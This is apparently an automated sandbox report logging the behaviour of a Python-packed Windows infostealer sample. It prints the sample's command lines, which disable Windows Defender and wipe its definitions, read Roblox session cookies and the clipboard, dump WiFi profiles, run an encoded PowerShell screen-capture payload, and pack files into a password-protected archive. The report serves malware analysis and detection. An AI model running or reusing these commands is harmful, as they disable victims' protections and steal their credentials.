Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe, 00000002.00000002.1772852379.00007FF8E7391000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe ReversingLabs: Detection: 57%
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe String found in binary or memory: id-cmc-addExtensions
Source: SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe String found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
